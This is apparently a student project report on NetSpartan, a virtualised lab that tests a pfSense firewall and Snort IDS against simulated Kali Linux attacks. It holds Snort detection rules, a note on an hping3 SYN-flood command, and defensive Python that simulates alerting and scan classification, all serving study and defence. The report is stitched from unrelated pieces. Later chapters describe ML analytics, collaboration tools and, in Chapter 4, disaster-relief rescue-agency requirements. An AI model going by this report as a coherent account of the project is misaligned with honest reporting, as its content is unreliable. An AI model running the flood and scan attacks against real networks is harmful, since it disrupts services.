Net Spartan

LIST OF FIGURES

FIGURE NUMBER FIGURE NAME PAGE NUMBER

FIGURE 5.1 System Architecture 20

FIGURE 5.2 Network Topology 22

FIGURE 6.1 NetSpartan script initiation 25

FIGURE 6.2 Source rules for Snort (IDS) 27

FIGURE 6.3 Example of defined rules in Snort 29

FIGURE 7.1 NMAP scan results 45

FIGURE 7.2 Console alert response 45

FIGURE 7.3 DOS attack initiation 46

FIGURE 7.4 IDS alerts for DOS 46

Advance network Defense Systems with IDS Introduction

CHAPTER 1

INTRODUCTION

1.1 Overview

In today’s digital age, where organizations, businesses, and individuals are increasingly dependent on
computer networks for communication, data storage, and operations, the need for robust cybersecurity
measures has never been more critical. The rapid proliferation of cyberattacks, such as Distributed
Denial of Service (DDoS), unauthorized port scanning, malware infiltration, and unauthorized
access, has exposed the vulnerabilities of traditional security measures. These attacks not only disrupt
essential services but also lead to massive financial losses, data breaches, and reputational damage.

Traditional security systems, such as standalone firewalls, are no longer sufficient to address the
complexity of modern cyber threats. A firewall regulates incoming and outgoing traffic by address,
port, protocol and connection state according to predefined rules, but it does not inspect the
content of the traffic it allows for attack signatures or anomalous patterns. An Intrusion Detection
System (IDS), on the other hand, looks for suspicious patterns in network traffic and alerts
administrators about potential security breaches, but on its own it only alerts and does not block.
When combined, the two components form a layered defense that prevents, detects, and
mitigates cyber threats.

The NetSpartan project focuses on the simulation of an advanced multi-layered network defense
system by integrating a pfSense firewall with a Snort Intrusion Detection System (IDS). The
project leverages a virtualized environment to mimic real-world network scenarios, where
cyberattacks are simulated using Kali Linux tools (e.g., Nmap, Hping3, and Metasploit). Traffic
patterns generated by these attacks are captured and analyzed using Wireshark, and the performance
of the firewall and IDS is evaluated.
The project provides a hands-on demonstration of how multi-layered security solutions can be
implemented, configured, and tested in a controlled environment. By simulating real-world
cyberattack scenarios and analyzing the system’s responses, the project highlights the importance of a
proactive defense strategy to safeguard critical networks against evolving threats.

Key Features of the Project


1. Firewall Configuration (pfSense):
o Installation and configuration of pfSense as the first line of defense to filter and block
unauthorized network traffic.
o Creation of rules to allow legitimate traffic while rejecting potentially harmful packets.

Dept. of CSD 2 2024-2025


SJCIT

o Real-time logging and monitoring of access attempts and traffic flow.

2. Intrusion Detection System (Snort):

o Setup of Snort IDS to monitor network traffic and identify malicious or suspicious
activities.
o Implementation of predefined and custom Snort rules to detect common attack patterns like
DDoS, port scanning, and brute force attacks.
o Generation of alerts for identified threats and their sources.
3. Attack Simulation (Kali Linux):
o Use of ethical hacking tools from Kali Linux to simulate various types of cyberattacks,
such as:
 DoS attacks: Overwhelming the network with traffic (a single Kali VM stands in for the
many sources of a real DDoS).
 Port Scanning: Identifying open and vulnerable ports.
 Vulnerability Exploitation: Attempting to exploit system weaknesses.
4. Traffic Monitoring and Analysis (Wireshark):
o Capturing and analyzing network packets to observe attack patterns and identify
anomalies.
o Validating the effectiveness of the firewall and IDS mechanisms in blocking and detecting
threats.
o Generating detailed traffic logs and threat reports.
The project also sets out to:

1. Showcase the Integration of pfSense and Snort:
Demonstrate how combining a firewall and IDS can enhance network security.
2. Simulate Real-World Cyberattacks:
Create realistic attack scenarios to validate the effectiveness of the defense mechanisms.
3. Monitor and Analyze Traffic in Real Time:
Use Wireshark to capture and analyze traffic data during attacks.
4. Highlight the Role of Layered Security Solutions:
Illustrate how multiple tools can complement each other to mitigate security risks.
5. Provide a Learning Platform:
Help students, researchers, and IT professionals understand the importance of proactive
security strategies.

Dept. of CSD 3 2024-2025


SJCIT
Advance network Defense Systems with IDS Introduction

1.2 Objectives

1. Enhance Understanding of Network Security Concepts:

Provide a hands-on learning experience to understand the fundamental principles of
network security, focusing on firewalls, intrusion detection systems (IDS), and
network traffic analysis. This will equip participants with the skills needed to
manage and protect enterprise-level networks.

2. Simulate and Defend Against Real-World Cyberattacks:

Create and simulate a wide range of cyberattacks, including but not limited to:
 Denial of Service (DoS) attacks to stress-test the network’s capacity.
 Port scanning to detect and evaluate open ports and services.
 Vulnerability exploitation to understand the role of IDS in recognizing and
mitigating attack vectors. Use Kali Linux and its tools to ethically simulate
these attacks within a controlled environment.

3. Implement a Layered Defense Strategy:

Integrate pfSense firewall for packet filtering, stateful inspection, and traffic
control, while using Snort for real-time monitoring, intrusion detection, and alert
generation. The layered defense strategy will demonstrate how multiple security
layers work together to provide comprehensive network protection.

4. Develop and Test Security Configurations:

Configure and fine-tune firewall rules within pfSense to establish best practices for
access control and network segmentation. Implement and optimize Snort rules to
detect a variety of network anomalies and threats, ensuring that the IDS can promptly
alert administrators to potential security incidents.

5. Assess the Effectiveness of Security Mechanisms:

Measure and evaluate the effectiveness of the firewall and IDS configurations by
monitoring their response to different attack vectors. Identify areas of improvement
and explore how proactive adjustments can mitigate risks and reduce vulnerabilities.


1.3 Problem Identification and Definition

Despite advancements in security technologies, many networks still lack a proactive, multi-
layered defense strategy. Most security systems rely on either standalone firewalls or
Intrusion Detection Systems (IDS), both of which are essential but insufficient when used
in isolation. A firewall helps filter traffic but does not analyze patterns for suspicious
activities, while an IDS identifies anomalies but cannot directly block malicious traffic. This
fragmented approach leaves organizations vulnerable to:

External Attacks:

Denial of Service (DoS): Flooding the network with traffic to overwhelm its resources.
Port Scanning: Identifying open and vulnerable ports to exploit services.
Vulnerability Exploitation: Using known security gaps to gain unauthorized access to
systems.

Internal Threats:

Malicious activities within the network may bypass traditional security mechanisms.
Misconfigurations and poorly monitored traffic allow attackers to stay undetected.

Cost-Effective Simulation:

NetSpartan demonstrates that network security can be tested and implemented in a
virtualized environment without expensive hardware, making it accessible to small
organizations, students, and educators.

Adaptability for Future Solutions:

The relevance of this project stems from the increasing sophistication of cyberattacks, which
target critical infrastructure, businesses, and individuals. With cyber threats becoming more
frequent and complex, it is crucial to develop integrated solutions that provide comprehensive
network security. The NetSpartan project not only addresses practical cybersecurity
challenges but also serves as an educational platform for developing essential skills in
network defense. By leveraging virtualization, the project offers a cost-effective and scalable
simulation environment, making it accessible for students, educators, and small
organizations to learn and experiment with modern network security tools.


1.4 Proposed Solution


In the current digital landscape, networks are the backbone of communication, operations,
and data transfer across organizations, governments, and individuals. However, with
increasing connectivity, the risk of cyberattacks and network breaches has escalated
significantly. Organizations face constant threats from malicious entities attempting to
compromise their network security, disrupt services, or gain unauthorized access to sensitive
data.

As set out in Section 1.3, most security systems rely on either a standalone firewall or an
Intrusion Detection System (IDS), both essential but insufficient when used in isolation. This
fragmented approach leaves organizations vulnerable to:

1. External Attacks:

o Distributed Denial of Service (DDoS): Flooding the network with traffic to overwhelm its
resources.

o Port Scanning: Identifying open and vulnerable ports to exploit services.

o Vulnerability Exploitation: Using known security gaps to gain unauthorized access to
systems.

2. Internal Threats:

o Malicious activities within the network may bypass traditional security mechanisms.

o Misconfigurations and poorly monitored traffic allow attackers to stay undetected.

3. Lack of Comprehensive Monitoring and Response:

o Many networks do not have real-time visibility into their traffic.

o Alerts generated by intrusion detection systems are often overlooked or not actionable
due to a lack of integration with security tools.

4. Cost and Complexity:

o Implementing advanced security mechanisms can be expensive and resource-intensive.
Small to mid-sized organizations, educational institutions, and individuals often
struggle to set up and maintain robust security solutions.


As a result, organizations face challenges such as downtime, data breaches, financial
losses, and reputational damage, all stemming from their inability to deploy effective and
integrated security systems.

Given the limitations of standalone security tools, there is a critical need for a multi-layered
network security approach that combines:

1. A firewall for packet filtering, traffic control, and access management.

2. An Intrusion Detection System (IDS) to monitor traffic patterns and identify
malicious activities in real time.

3. Continuous traffic analysis to gain insights into attack behaviors and respond
effectively.

The project NetSpartan addresses this need by providing a simulated environment to
implement and integrate pfSense firewall and Snort IDS to defend against cyberattacks. By
simulating real-world scenarios with Kali Linux as the attacking platform, the project
identifies the network vulnerabilities and demonstrates:

1. How a firewall can act as the first line of defense to block unauthorized traffic.

2. How an IDS detects malicious patterns and triggers alerts for threats like DDoS, port
scanning, and exploitation attempts.

3. How network traffic can be captured and analyzed using tools like Wireshark to
assess the performance of the firewall and IDS under different attack conditions.

In summary, NetSpartan addresses the shortcomings of standalone network security systems
by demonstrating an integrated, multi-layered defense mechanism. It simulates real-world
attack scenarios and provides a structured approach to mitigating network threats through the
effective use of pfSense firewall, Snort IDS, and traffic analysis tools like Wireshark. This
project not only contributes to solving practical cybersecurity problems but also serves as an
excellent educational resource for building skills in network security and threat detection.


1.5 Methodology

The implementation of NetSpartan follows a systematic approach to simulate a
cybersecurity solution involving a firewall, an Intrusion Detection System (IDS), and attack
simulations. The methodology focuses on setting up a secure virtual environment,
configuring tools like pfSense and Snort, and validating their efficiency against real-world
attack scenarios simulated using Kali Linux:

1. Virtual Environment Setup:

The project begins with setting up an isolated virtual environment to safely simulate and
analyze cybersecurity threats. Virtualization software like VMware Workstation or
VirtualBox is used to host multiple virtual machines (VMs):
 pfSense Firewall VM: Acts as the primary firewall and network gateway to filter and
block malicious traffic.
 Snort IDS VM: Functions as the Intrusion Detection System, monitoring and alerting on
suspicious activity.
 Kali Linux VM: Used as the attacker system to simulate cyberattacks like port scans, DoS
attacks, and vulnerability exploits.
 Client Machine VM: A victim system (Windows or Linux) to test the impact of attacks
and monitor defensive responses.
The network topology is designed to ensure proper communication flow:
 The pfSense firewall acts as the gateway between the external (attacker) system and
internal (client) machines, so every packet from the Kali VM to the client traverses its
WAN and LAN interfaces.
 Snort IDS monitors all traffic passing through the LAN. A separate Snort VM only sees
frames addressed to other hosts if its LAN adapter is in promiscuous mode on the virtual
switch (in VirtualBox, the adapter's Promiscuous Mode set to Allow All); otherwise the
hypervisor delivers only the VM's own traffic and the IDS misses the attacks. Installing
the Snort package on pfSense itself avoids this, because the firewall already forwards
every LAN packet.

2. Firewall Configuration with pfSense:

The pfSense firewall is set up as the first line of defense in the network. The configuration
includes:
1. Firewall Rules: Rules are created to:
o Block unauthorized IP addresses.
o Restrict traffic based on protocols (TCP, UDP) and specific ports.
o Prevent access to vulnerable services.
o Limit the rate of new connections to absorb Denial of Service (DoS) attacks, using the
per-rule advanced options (maximum states, maximum source connections, and maximum
new connections per source per interval).
2. NAT and Traffic Routing: Network Address Translation (NAT) is configured to ensure
secure internal-to-external communication.


3. Logging and Monitoring: pfSense is configured to log incoming and outgoing traffic for
later analysis. The dashboard is used to visualize blocked attempts and system status.

3. Intrusion Detection with Snort:

Snort is integrated into the network to detect and alert on suspicious activity. The IDS operates
as follows:
1. Rule Configuration: Snort rules are customized to detect:
o Port scans from tools like Nmap.
o Brute-force login attempts.
o Denial of Service (DoS) traffic.
o Vulnerability exploitation attempts using Metasploit.
2. Traffic Inspection: Snort monitors all network packets and compares them to its
detection rules.
3. Alerts and Logs: When an attack pattern matches a rule, Snort generates an alert and logs
detailed packet information.
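As an added example (not code from the NetSpartan project or from Snort), the rules below are written in Snort 2 syntax for the thresholded cases listed above (SYN flood, SSH brute force, ICMP flood), and a small Python matcher approximates Snort's detection_filter so the thresholds can be checked offline, before the rules are loaded, against an hping3-style flood, a brute-force burst, and benign background traffic that must stay silent. The $HOME_NET range, the local SIDs, the hosts and the packet timings are assumptions.

```python
"""Snort-style threshold rules evaluated over constructed traffic.

Added example, not code from the NetSpartan project or from Snort. The rules
use Snort 2 syntax; a small matcher approximates detection_filter so the
thresholds can be tried offline. $HOME_NET, the local SIDs, the hosts and
the packet timings below are assumptions made for this example.
"""
import ipaddress
import re
from collections import defaultdict, deque

HOME_NET = ipaddress.ip_network("192.168.1.0/24")  # assumed LAN behind pfSense

LOCAL_RULES = """
alert tcp any any -> $HOME_NET any (msg:"NETSPARTAN SYN flood"; flags:S; \
detection_filter:track by_dst, count 20, seconds 5; sid:1000001; rev:1;)
alert tcp any any -> $HOME_NET 22 (msg:"NETSPARTAN SSH brute force"; flags:S; \
detection_filter:track by_src, count 5, seconds 60; sid:1000002; rev:1;)
alert icmp any any -> $HOME_NET any (msg:"NETSPARTAN ICMP flood"; \
detection_filter:track by_src, count 50, seconds 10; sid:1000003; rev:1;)
"""

HEADER = re.compile(r"^alert\s+(\w+)\s+\S+\s+\S+\s+->\s+\S+\s+(\S+)\s+\((.*)\)$")
FILTER = re.compile(r"track\s+(by_src|by_dst),\s*count\s+(\d+),\s*seconds\s+(\d+)")


def parse_rules(text):
    """Parse the subset of Snort rule options used above into dicts."""
    rules = []
    for line in text.strip().splitlines():
        m = HEADER.match(line.strip())
        if not m:
            raise ValueError(f"unsupported rule: {line}")
        proto, dport, body = m.groups()
        opts = {}
        for opt in body.split(";"):
            key, _, val = opt.strip().partition(":")
            if key:
                opts[key] = val.strip().strip('"')
        track, count, seconds = FILTER.search(opts["detection_filter"]).groups()
        rules.append({"sid": int(opts["sid"]), "msg": opts["msg"], "proto": proto,
                      "dport": None if dport == "any" else int(dport),
                      "flags": opts.get("flags"), "track": track,
                      "count": int(count), "seconds": int(seconds)})
    return rules


def _matches(rule, pkt):
    """Header test plus flags; flags:S requires exactly SYN, as in Snort."""
    _, proto, _, dst, dport, flags = pkt
    return (proto == rule["proto"]
            and ipaddress.ip_address(dst) in HOME_NET
            and rule["dport"] in (None, dport)
            and rule["flags"] in (None, flags))


def run_rules(rules, packets):
    """Return (ts, sid, tracked_host) once more than `count` matching packets
    for the tracked host fall inside a sliding window of `seconds`. This
    approximates Snort's detection_filter, which alerts on every further
    match after the threshold is exceeded within its sampling period."""
    recent = defaultdict(deque)
    alerts = []
    for pkt in sorted(packets, key=lambda p: p[0]):
        ts, _, src, dst, _, _ = pkt
        for rule in rules:
            if not _matches(rule, pkt):
                continue
            host = src if rule["track"] == "by_src" else dst
            window = recent[(rule["sid"], host)]
            window.append(ts)
            while ts - window[0] > rule["seconds"]:
                window.popleft()
            if len(window) > rule["count"]:
                alerts.append((ts, rule["sid"], host))
    return alerts


def constructed_packets():
    """Constructed records (ts, proto, src, dst, dport, tcp_flags)."""
    pkts = []
    # hping3 -S -p 80 --flood from the Kali VM: 40 SYNs in 2 s
    pkts += [(100 + i * 0.05, "tcp", "10.0.0.5", "192.168.1.10", 80, "S") for i in range(40)]
    # SSH brute force: 8 new connections to port 22 within 28 s
    pkts += [(200 + i * 4, "tcp", "10.0.0.6", "192.168.1.10", 22, "S") for i in range(8)]
    # ICMP ping flood: 60 echo requests in 3 s
    pkts += [(500 + i * 0.05, "icmp", "10.0.0.5", "192.168.1.10", 0, "") for i in range(60)]
    # Benign background that must stay silent: one HTTPS connection per second
    # from a LAN user, and a few legitimate SSH logins minutes apart
    pkts += [(300 + i, "tcp", "192.168.1.20", "192.168.1.10", 443, "S") for i in range(30)]
    pkts += [(400 + i * 200, "tcp", "192.168.1.21", "192.168.1.10", 22, "S") for i in range(4)]
    return pkts


# Ground truth for the constructed run: (sid, tracked host) pairs that should alert
EXPECTED = {(1000001, "192.168.1.10"), (1000002, "10.0.0.6"), (1000003, "10.0.0.5")}


def score(alerts, expected=EXPECTED):
    """Detection rate over the injected attacks, and the count of alerts that
    belong to none of them (false positives on the benign background)."""
    seen = {(sid, host) for _, sid, host in alerts}
    false_positives = sum(1 for _, sid, host in alerts if (sid, host) not in expected)
    return len(seen & expected) / len(expected), false_positives


if __name__ == "__main__":
    alerts = run_rules(parse_rules(LOCAL_RULES), constructed_packets())
    for ts, sid, host in alerts:
        print(f"{ts:8.2f}  sid {sid}  {host}")
    print("detection rate, false positives:", score(alerts))
```

Port scans are deliberately not covered by a rule here: in Snort 2 they are handled by the sfportscan preprocessor, not by per-rule thresholds. The benign background exists to confirm the thresholds stay quiet on normal LAN traffic; if a capture of the real LAN at rest still trips a rule, raise its count or shorten its seconds window before blaming the attacker.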

4. Attack Simulation with Kali Linux:

To test the defenses, Kali Linux is used to simulate real-world cyberattacks. The following
techniques are employed:
1. Port Scanning: Using Nmap, open ports and running services on the client machine are
identified.
2. Denial of Service (DoS): Tools like Hping3 are used to send a flood of packets (for
example SYN packets to a single port) to overwhelm network resources. Because the flood
comes from one Kali VM, the simulation is a single-source DoS rather than a distributed
attack, so per-source rate limiting in pfSense is more effective here than it would be
against a real DDoS.
All attacks are launched in a controlled environment, and their effects are monitored through
pfSense and Snort logs.

5. Traffic Monitoring and Analysis:

The network traffic is closely analyzed during the simulation phase using tools like
Wireshark, pfSense logs, and Snort alerts:
 Traffic Analysis: Wireshark captures network packets to determine which traffic was
allowed or blocked.
 Log Analysis:
o pfSense logs are reviewed to identify which firewall rules were triggered.


o Snort alerts are examined to verify the detection of malicious activity.

 Performance Metrics:
o Detection Rate: The percentage of simulated attacks for which Snort raised an alert.
o Blocked Traffic: Malicious traffic successfully filtered by pfSense.
o False Positives: Instances where legitimate traffic was incorrectly flagged.
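Added example, not part of the report: how the "allowed or blocked" determination from a capture can be made mechanically rather than by reading Wireshark by eye. It constructs the Ethernet/IPv4/TCP frames of a SYN scan inline (the addresses and ports are assumptions), parses them at header level the way a dissector would, classifies each probed port from the victim's reply, and derives the Blocked Traffic figure from the verdicts.

```python
"""Classifying a SYN scan from captured frames, header by header.

Added example, not code from the NetSpartan project. It rebuilds what an
analyst does in Wireshark when deciding which traffic was allowed or blocked:
for every SYN the attacker sent, look for the victim's reply. Frames are
constructed inline with struct; the addresses and ports are assumptions.
"""
import struct

ATTACKER = "10.0.0.5"    # Kali VM on the pfSense WAN side (assumed)
VICTIM = "192.168.1.10"  # client VM on the LAN (assumed)
SYN, RST, ACK = 0x02, 0x04, 0x10


def _ip(addr):
    return bytes(int(octet) for octet in addr.split("."))


def build_tcp_frame(src, dst, sport, dport, flags):
    """Ethernet II + IPv4 + TCP header, no payload. Checksums are left zero,
    which is fine for offline parsing but would be rejected by a real host."""
    eth = b"\x00" * 12 + struct.pack("!H", 0x0800)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0, _ip(src), _ip(dst))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)
    return eth + ip + tcp


def parse_tcp(frame):
    """Return (src, dst, sport, dport, flags) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != 0x0800:
        return None
    if frame[23] != 6:  # IPv4 protocol field: 6 is TCP
        return None
    ihl = (frame[14] & 0x0F) * 4
    src = ".".join(map(str, frame[26:30]))
    dst = ".".join(map(str, frame[30:34]))
    off = 14 + ihl
    sport, dport = struct.unpack("!HH", frame[off:off + 4])
    return src, dst, sport, dport, frame[off + 13]


def classify_scan(frames, attacker, victim):
    """Map each port the attacker probed with a SYN to 'open' (SYN/ACK came
    back), 'closed' (RST came back) or 'blocked' (no reply at all, which is
    what a pfSense block rule that drops silently produces)."""
    probed, replies = set(), {}
    for frame in frames:
        parsed = parse_tcp(frame)
        if parsed is None:
            continue
        src, dst, sport, dport, flags = parsed
        if src == attacker and dst == victim and flags == SYN:
            probed.add(dport)
        elif src == victim and dst == attacker:
            if flags & SYN and flags & ACK:
                replies[sport] = "open"
            elif flags & RST:
                replies.setdefault(sport, "closed")
    return {port: replies.get(port, "blocked") for port in sorted(probed)}


def blocked_fraction(verdicts):
    """The Blocked Traffic metric: share of probed ports the firewall dropped."""
    return sum(1 for v in verdicts.values() if v == "blocked") / len(verdicts)


def constructed_capture():
    """Constructed capture of a five-port SYN scan: 22 and 80 open, 443 closed,
    445 and 3389 silently dropped by a pfSense block rule."""
    frames = [build_tcp_frame(ATTACKER, VICTIM, 40000 + p, p, SYN)
              for p in (22, 80, 443, 445, 3389)]
    frames.append(build_tcp_frame(VICTIM, ATTACKER, 22, 40022, SYN | ACK))
    frames.append(build_tcp_frame(VICTIM, ATTACKER, 80, 40080, SYN | ACK))
    frames.append(build_tcp_frame(VICTIM, ATTACKER, 443, 40443, RST | ACK))
    # Nmap resets the half-open connection itself; this is attacker traffic,
    # not a victim reply, and must not change the verdict for port 22
    frames.append(build_tcp_frame(ATTACKER, VICTIM, 40022, 22, RST))
    return frames


if __name__ == "__main__":
    verdicts = classify_scan(constructed_capture(), ATTACKER, VICTIM)
    for port, verdict in verdicts.items():
        print(f"{port:5d}/tcp  {verdict}")
    print(f"blocked: {blocked_fraction(verdicts):.0%}")
```

The three verdicts correspond to Nmap's open, closed and filtered states in the scan results. A port reported as blocked here can also mean the victim was down or its reply was lost, so the verdict should be cross-checked against the pfSense firewall log for a matching block entry before it is counted as filtered traffic.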

6. Outcome Validation:

By correlating attack data with firewall and IDS logs, the system’s effectiveness is evaluated.
Insights include:
 How well the pfSense firewall blocks malicious traffic.
 Snort’s ability to detect and alert against known attack patterns.
 Overall network resilience against simulated threats.
This methodology ensures that the NetSpartan project successfully demonstrates the
combined efficiency of a firewall and IDS in mitigating cyberattacks, providing a practical
and visual understanding of network security.


CHAPTER 2

LITERATURE SURVEY
[1] Title: “Performance Evaluation of Intrusion Detection Systems in High-Speed Networks”
Authors: Deepak Kumar, Sunil Gupta, Rashmi Singh
This paper explores the challenges of intrusion detection in high-speed networks, focusing on
the limitations of traditional systems in handling large data volumes. The study compares the
performance of various IDS tools in terms of detection accuracy, processing speed, and
scalability in gigabit networks.
Methodology:
 Feature Selection: Reduces dimensionality by identifying relevant features using
Principal Component Analysis (PCA).
 Parallel Processing: Implements IDS using parallel computing frameworks to handle
high-speed traffic effectively.
 Evaluation Metrics: Includes false-positive rate, throughput, and latency for
assessing IDS performance.
Prototype and Results:
Experiments demonstrate improved throughput and detection rates using parallelized IDS
systems, particularly for tools like Snort and Suricata.
Disadvantages:
 Resource-intensive, requiring high computational power for parallel processing.
 Limited adaptability to zero-day attacks without frequent updates to rule sets.

[2] Title: “Adaptive Firewall Mechanisms for Dynamic Network Environments”

Authors: Jennifer Moore, Rajesh Sharma, Alex Nguyen

This research proposes an adaptive firewall system capable of dynamically adjusting its rules
based on real-time traffic patterns and emerging threats. The system is designed to handle
varying network loads and types of traffic effectively.

Methodology:

 Machine Learning Integration: Uses reinforcement learning to update firewall rules
dynamically.
 Anomaly Detection: Identifies unusual patterns to preemptively block potential
threats.

 Simulation Testing: Validated using simulated enterprise network traffic.

Prototype and Results:

The adaptive firewall demonstrated improved response times and reduced manual rule
configuration in real-time testing scenarios.

Disadvantages:

 Computational overhead due to constant training of ML models.
 Susceptibility to adversarial attacks targeting ML algorithms.

[3] Title: “A Hybrid Approach to Intrusion Detection Using Machine Learning and
Signature-Based Techniques”

Authors: Sophie Turner, Anil Kapoor, Michael Reed

This study presents a hybrid intrusion detection system combining the strengths of signature-
based detection for known threats and machine learning for anomaly detection. The aim is to
improve detection accuracy and reduce false positives.
Methodology:
 Signature-Based Detection: Implements Snort rules for detecting predefined threats.
 Anomaly-Based Detection: Utilizes support vector machines (SVM) to identify
deviations from normal traffic patterns.
 Hybrid Model: Integrates both methods for comprehensive coverage.
Prototype and Results:
The hybrid system significantly reduced false positives compared to standalone signature-
based or ML-based systems, achieving 92% accuracy.
Disadvantages:
 Complexity in integrating and fine-tuning the hybrid model.
 High processing requirements for large-scale networks.


[4] Title: “Simulation-Based Evaluation of Cyberattack Scenarios in Virtualized
Networks”

Authors: Karen Wright, Nitin Sharma, Farooq Khan

The paper focuses on simulating cyberattacks within virtualized networks to evaluate the
effectiveness of security tools. The study creates various attack scenarios, such as DDoS and
SQL injection, to analyze IDS and firewalls' performance.
Methodology:
 Virtualized Environment: Uses VMware to replicate enterprise networks.
 Attack Simulation: Deploys tools like Metasploit and Kali Linux for generating
realistic attack scenarios.
 Performance Metrics: Measures detection time, false positives, and mitigation
efficiency.
Prototype and Results:
The simulations revealed gaps in IDS performance under complex attack patterns,
emphasizing the need for hybrid defense mechanisms.
Disadvantages:
 Requires expertise in configuring realistic virtual environments.
 Limited scope for evaluating physical network behaviors.

[5] Title: “Blockchain-Based Secure Data Sharing in IoT Networks”

Authors: Arjun Patel, Emily Davis, Harish Kumar

This study explores the use of blockchain technology for secure data sharing in IoT networks.
By leveraging the immutability and decentralization of blockchain, the proposed system aims
to mitigate common IoT vulnerabilities like data tampering and unauthorized access.

Methodology:

 Permissioned Blockchain: Uses Hyperledger Fabric for IoT devices to share data
securely.

 Smart Contracts: Implements automated rules for data access and validation.

 Scalability Testing: Evaluates system performance under varying IoT device loads.


Prototype and Results:

The blockchain-based system demonstrated improved data integrity and access control while
maintaining low latency for IoT communication.

Disadvantages:

 High resource consumption for maintaining blockchain nodes.
 Complexity in integrating blockchain with legacy IoT systems.



CHAPTER 3

SYSTEM ANALYSIS

Problem Identification and Definition

In the rapidly evolving landscape of cyber threats, traditional network defenses are often
insufficient to combat sophisticated and emerging attack vectors. Organizations face
significant challenges in safeguarding sensitive data, maintaining system integrity, and
ensuring the uninterrupted availability of their digital assets. The inadequacy of existing
solutions arises from a lack of real-time threat detection, fragmented security measures,
and insufficient automation in response systems.

Fragmented Security Measures:

Many organizations rely on a combination of disconnected security tools, such as
firewalls, intrusion detection systems (IDS), and antivirus software. These tools often
operate in isolation, making it challenging to achieve a holistic view of the network's
security posture and increasing the risk of blind spots.

Lack of Real-Time Threat Detection:

Cyberattacks, particularly zero-day exploits and advanced persistent threats (APTs),
require immediate detection and response. However, traditional solutions often fail to
detect these attacks in real time due to outdated signature-based detection methods and
limited machine learning integration.

Manual Incident Response Processes:

Incident response in many organizations is still largely manual, relying on human
intervention to analyze threats and deploy countermeasures. This manual approach leads to
delays in neutralizing threats, giving attackers more time to exploit vulnerabilities.

Consequences of Insufficient Cybersecurity Systems:

The lack of robust, integrated, and automated cybersecurity systems results in several
critical consequences:

 Data Breaches: Sensitive information, such as customer data and intellectual
property, is at risk of exposure.
 Operational Downtime: Network intrusions can lead to system disruptions,
affecting business continuity.
 Financial Losses: The costs associated with data breaches, including fines, legal
expenses, and reputational damage, can be substantial.
 Evolving Threat Landscape: As attackers become more sophisticated, traditional
tools are unable to keep pace, leaving networks vulnerable to novel threats.

To address these pressing challenges, there is a need for a comprehensive and automated
cybersecurity solution capable of integrating various tools, leveraging machine learning
for real-time threat detection, and providing a unified system for robust network defense.


Objectives

 Create a centralized system to monitor and detect network threats in real time.
 Ensure strong security and privacy with advanced protection measures.
 Enable smooth communication and coordination among security teams.
 Design a user-friendly interface for easy access and management

Motivation
Cybersecurity threats are constantly evolving, putting sensitive data and critical systems at risk. The
motivation for this project stems from the urgent need to:
 Protect sensitive data: Safeguard personal, organizational, and critical infrastructure
information from breaches and unauthorized access.
 Ensure system integrity: Prevent disruptions and maintain the functionality of networks and
systems in the face of cyberattacks.
 Enhance response efficiency: Enable real-time threat detection and response to minimize
damage and downtime.
 Promote collaboration: Foster seamless integration of tools and communication among
security teams for a unified defense strategy.
Existing System

In the field of cybersecurity, there are various traditional systems and tools available with
limited functionality:
 Standalone Firewalls and Intrusion Detection Systems (IDS): Many organizations
rely on basic firewalls and IDS to protect their networks. While these systems can
detect known threats, they often lack the ability to identify sophisticated or emerging
cyberattacks.
 Individual Security Tools: Separate tools like antivirus software, malware scanners,
and encryption programs operate independently, making it difficult to achieve a
unified security approach.
 Manual Response Systems: Incident responses are frequently handled manually,
involving significant delays in detecting, analyzing, and mitigating threats.
These existing systems lack the integration, real-time capabilities, and automation required to
address modern cybersecurity challenges effectively. They also do not provide centralized
visibility or seamless collaboration among teams, leaving networks vulnerable to advanced
and coordinated attacks.


Proposed Solution

The proposed system, NetSpartan, aims to revolutionize cybersecurity through an integrated
and intelligent solution offering:

 Real-time Threat Detection: NetSpartan provides real-time monitoring of network
activities to instantly detect and respond to potential threats.

 Centralized Management System: A unified platform aggregates data from multiple
security tools and systems, offering a holistic view of network health and
vulnerabilities.

 Automated Response Mechanisms: The system automates threat mitigation
processes, reducing response time and minimizing human intervention.

 Collaborative Tools for Security Teams: NetSpartan includes communication and
task management features to enhance collaboration and streamline workflows among
security teams.

 Advanced Analytics and Reporting: Equipped with AI-driven analytics, the
platform provides insights into patterns, potential vulnerabilities, and predictive threat
modeling.

 Enhanced Usability and Accessibility: Designed with a user-friendly interface,
NetSpartan ensures that even non-technical users can navigate and utilize its features
efficiently.

By combining cutting-edge technologies and practical tools, NetSpartan ensures robust
network security, reduces operational risks, and strengthens an organization's overall cyber
resilience.


Advantages

 Real-Time Threat Detection: Immediate detection of threats enables a faster
response time, minimizing damage and reducing the chances of successful
cyberattacks.

 Centralized Security Management: A single platform to manage security alerts
from different tools and sources helps security teams gain better control over their
network, improving overall efficiency.

 Automated Threat Mitigation: Automated response systems reduce human error,
ensure quicker threat neutralization, and allow security teams to focus on more
complex tasks.

 Improved Collaboration Among Security Teams: Integrated communication tools
foster better teamwork, making it easier for teams to respond to incidents together and
share intelligence.

 Comprehensive Threat Intelligence: NetSpartan aggregates data from various
sources to provide a clear view of the threat landscape, improving situational
awareness.

 Optimized Resource Allocation: By tracking available personnel, software, and
hardware tools, the platform ensures resources are deployed where they are most
needed.

 Predictive Analytics for Future Threats: Using machine learning, the system can
predict potential vulnerabilities and provide proactive measures to prevent attacks.

 Enhanced Decision-Making: With comprehensive, real-time data, security teams
can make more informed decisions during cybersecurity incidents, enhancing the
response strategy.

 Increased Visibility and Accountability: Continuous monitoring and reporting
features allow stakeholders to track network security efforts, improving transparency
and accountability across organizations.



CHAPTER 4

SYSTEM REQUIREMENT AND SPECIFICATION

4.1 FUNCTIONAL REQUIREMENTS

User Registration and Profile Management:

 Rescue agencies must be able to register on the platform using basic credentials (name, email,
password).
 Agencies should have profile management features to update their contact details, expertise,
and available resources such as medical equipment, vehicles, or personnel.

Location Registration:

 Agencies should be able to manually input their location details (address, GPS coordinates) or
use an automated GPS system for accurate positioning in real-time.
 The system should be able to capture the agency’s current location dynamically as they move
or deploy resources in the field.

Real-Time Mapping:

 A map interface should display the locations of all registered rescue agencies, offering a
dynamic view of the ongoing disaster relief efforts.
 Agencies should have the option to zoom, pan, and filter the map based on various parameters
such as disaster type, resources available, or the last recorded activity of a specific agency.

Communication Features:

